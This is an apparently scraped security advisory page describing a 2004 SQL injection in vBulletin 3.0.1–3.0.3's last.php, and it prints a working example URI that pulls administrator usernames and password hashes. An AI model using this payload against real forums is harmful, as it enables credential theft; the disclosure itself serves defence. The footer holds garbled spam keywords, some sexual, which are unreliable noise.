about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , vBulletin LAST.PHP SQL Injection Vulnerability


Title vBulletin LAST.PHP SQL Injection Vulnerability
Published 2004-11-11-12:00AM
Updated 2004-11-12-04:55PM
Class Input Validation Error
CVE   CVE-MAP-NOMATCH
Remote  Yes
Local  No
Credit  "Dr. Death" <drdeath4ever@hotmail.com> disclosed this vulnerability.
Vulnerable  VBulletin VBulletin 3.0.3
VBulletin VBulletin 3.0.2
VBulletin VBulletin 3.0.1
Not Vulnerable  
Code   An example URI sufficient to exploit this vulnerability has been provided:

http://www.example.com/last.php?fsel=,user.password%20as%20title,user.%20%20%20%20username%20as%20lastposter%20FROM%20user,thread%20%20%20%20%20WHERE%20usergroupid=6%20LIMIT%201
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 18:06:42 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
www.mallik www.taobao wwww.xnxxc news for c gcc local 113231 w,v hfhpdi www.szpkub news for C www.mqdm.n microsoft anal sexy 6asia9 mambo Remo Xxxgirle news for c bbfjfkf microsoft 6asia9 news for c cum Cr 00000F 200 /compo mambo+Remo www.sexhug www.zhnew. www.xpass. www.97mmxz maxcpm.inf girls 18 linux 2.4. firefox fo Indiansex. Xxx india zooporno www.ecallm Phonerotic mambo Remo www.goozw. post.cnfol Enthrallwe www.jshuwe Xxx india kar20.com www.tamils free vidio www.pornop php 5.1 alexa.xuew www.taodes